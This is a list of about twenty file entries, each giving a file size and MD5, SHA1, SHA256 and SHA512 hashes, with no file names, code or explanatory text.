SHA1: 955a838a9e09826b63d1e02668b823dcd44597f1
SHA256: 4814bb63a7e8ed73e0f9625886408027eac5a1e086c630b78c31f65873ee3961
SHA512: 16bd2dffb7c71b5dfb210d7a1d40752acd206cd8aae18c5d72adab4289edeffe98e00093ac250506447f5972ca705562413ce40a39d90c85009247ae262b0e45

Filesize: 16KB
MD5: 84cdcc86fe9ebaee6b00b9fe87754e25
SHA1: c27d4fc2e8e51d01fa80ae4be532e651bbf15522
SHA256: 818d131b5ac88b5222cd793fceb611854a454b2046fd792452ddf91fa9f9d4b1
SHA512: 279f8fe15d06bdec1e5c0f894ed38e1ff4ec5624b214418babed654b4ccc63cacb43c9c129c757cda199833cf8297a647e3c3f1876f5a89de73251462c7efebc

Filesize: 16KB
MD5: 79276ffb27951bc8e314ed75a4205c8d
SHA1: 8a5a577cd7331d9f10830df6f133ba6678a961c0
SHA256: 05ff22f4d1eb7c6fcb851c76b836da36696e2375f20a75ab5186fc9a0c84cd34
SHA512: 4e6571f7b6e7e500dc1fdfadb6ed2371298f371afb9777e3c99cc73be466297abcfefe6caa67d6a739a1501f2695f1363f64d2669f95d9cd5ec5c97f274357f8

Filesize: 16KB
MD5: fa1c0285e9e70265a6be997960185893
SHA1: e7c1d5527ff2d4c75c54f986ad657fa33cfa98a1
SHA256: 9aa49531b8dd136cf75176f15fe280f3d88600376de96b941fa84b56e088ec27
SHA512: a46c72c76715f146cf9d1528dd2f58ab9ac8daa5ee60fddcb7672431329acdacace00ccfe909930be4fe661bcf2b6ad2980f9f32ba4cc1aac376efee6b0db5ae

Filesize: 16KB
MD5: edfcc6486a7b4b12eba7bb324f4eb08f
SHA1: e136b2a5b8f264e07d778db960d1276fa9ca9d65
SHA256: 9ece1b13d68f08b127898962c22a0f8f78ef3887da7c1c58cccda5dafe125a20
SHA512: b9ecec39b7ad444768a7187043b22b29328a86315475051c8924b6d2254cc07d00d96a6418280bbec550ddd7d31565b12f27a3fbb17793c2e4e55b3c2d7f07e1

Filesize: 16KB
MD5: 09ac5e166bb337e64fbe9cdd8a9b9dab
SHA1: 88a373f46026dba1c2eb9ae26b82a79b6588de87
SHA256: a8d26e109953f18fb1d044c541c31d9a0f6c54239b39beca966f339162764d12
SHA512: 111e1897893cd1e023d016f3ffcd19f496715d8785a0f8accab27da9f7f426989eeca8a3effccace65960ea76bf767c193fcc52db24ec1ab57e78f3b9788b60a

Filesize: 16KB
MD5: 56b62d9f1d96a94ee7dd4c188571c12c
SHA1: 8329eac90dbb36e819d2d90b07ef533b532cccbd
SHA256: ffa7c74af349cc2fb3bc46485c6ecb9911b5897e79ebb67846bdcad3bd31971f
SHA512: 26baeef7fbf2e1bbe1c99ffdd9177e5c96e843870733b23dfed68351ddb8b51faa5fde8f466c5b95a66d32bcfcde041a57faafe7e034a2400f3e01173a406069

Filesize: 16KB
MD5: 8661fa4a186fc9c0e83eac1b67cd323a
SHA1: 6229f2b1986927630ce391f8a380d5348ff64c7b
SHA256: 88f55ba5efae98d1e23193906910c6014696b4d3aa2ed0ed8609f5d406b8012a
SHA512: eefff6737aaeacbe9b1085fc09a7acca7a0ab6ee56c4d0655639c05602314dfc98cdaa75faaca3e4f22604a0a81f283b82f2837e416db7b2ea31b62fbfa2c2c9

Filesize: 16KB
MD5: 638e453deb9a8cf717c4cf8d2482c1e2
SHA1: aefeeb059e9c835f6b05e9459be389b6bdf8d807
SHA256: f27e3d3c0d8979894059ad7a296efa7601cb009b244cbee2d56d8e3179bb1d21
SHA512: 82a9726bcef80afe238a358c7cb07b1b3031deccaedcbc4f9a64b6a18dbf6f3718b16de329aff8b97d702bdf73edc42288be533919000b811464c54d16e2d535

Filesize: 128KB
MD5: 3bc84c0e8831842f2ae263789217245d
SHA1: d60b174c7f8372036da1eb0a955200b1bb244387
SHA256: 757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824
SHA512: f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

Filesize: 976KB
MD5: 6e81752fb65ced20098707c0a97ee26e
SHA1: 948905afef6348c4141b88db6c361ea9cfa01716
SHA256: b978743a252c7d0661b1a41a60a68ee1a4d4ff5f21c597ebbe1c50dbe91dbed6
SHA512: 00c870461d47b7479f15594659141e3ced7c3f3d4b4151fb7776ab62d4816c587b388d024ab8edff1190bd23148897f085f736e897657c6f02a8f62f7af1cfaa

Filesize: 1.0MB
MD5: 25d9f83dc738b4894cf159c6a9754e40
SHA1: 152a0e0a8319c8d6bfbe6ae71ae5dda5cba2caca
SHA256: 8216cf00254d2febdfa67014d7265e008a6f485724c68579c5921f91a0069135
SHA512: 41a995bd29eaaf8b9ebed313f33eaf6ba217e331341888feb274df22328aca34a15bc0dd761cbdadf8d0491ed80d18025b88d8e1db862be2a886d99005b11f22

Filesize: 702KB
MD5: e72eb3a565d7b5b83c7ff6fad519c6c9
SHA1: 1a2668a26b01828eec1415aa614743abb0a4fb70
SHA256: 8ff1e74643983f7ca9bca70f1bea562e805a86421defde1bd57fc0da3722f599
SHA512: 71ae4db9c307c068f31a4e6471d950d1112d89d5661a4960dffbf6a7343cc313f98cfc35c5a10d38aae68be4b0a3f6a702fd5c28d938ca00094b26d0bcf03da3

Filesize: 31B
MD5: b7161c0845a64ff6d7345b67ff97f3b0
SHA1: d223f855da541fe8e4c1d5c50cb26da0a1deb5fc
SHA256: fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66
SHA512: 98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

Filesize: 1KB
MD5: c878d8c696efd352808a14e9343fd776
SHA1: 8054f081d6fde78d80e637a73b763b95166d6426
SHA256: f27db90a59f03fc7c71f73766102b48e54fd04b4d6011a75931f159ec583a2b4
SHA512: 4e60ccfe5b7e05a19f373a86a02c850faf5c758b0a8b013ccb49a6f8fbc29b5fdb4fa61c020fb5610ee32dbe31e51f3cedf8139a3005b574022eb0e19de5cb9e

Filesize: 787KB
MD5: 45ca138d0bb665df6e4bef2add68c7bf
SHA1: 12c1a48e3a02f319a3d3ca647d04442d55e09265
SHA256: 3960a0597104fc5bbf82bf6c03564a1eb6a829c560d1f50d0a63b4772fafbe37
SHA512: cd1a0493c26798eb70b3dabb8a439de7792c4676905cad21c6b3f372213ce9f6b65648245defcd36d4f19285160f41c62e1025e772e6b9f11aa126388ea8364f

Filesize: 216KB
MD5: 8f995688085bced38ba7795f60a5e1d3
SHA1: 5b1ad67a149c05c50d6e388527af5c8a0af4343a
SHA256: 203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006
SHA512: 043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

Filesize: 184KB
MD5: 7fee8223d6e4f82d6cd115a28f0b6d58
SHA1: 1b89c25f25253df23426bd9ff6c9208f1202f58b
SHA256: a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59
SHA512: 3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

Filesize: 61KB
MD5: a6279ec92ff948760ce53bba817d6a77
SHA1: 5345505e12f9e4c6d569a226d50e71b5a572dce2
SHA256: 8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181
SHA512: 213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c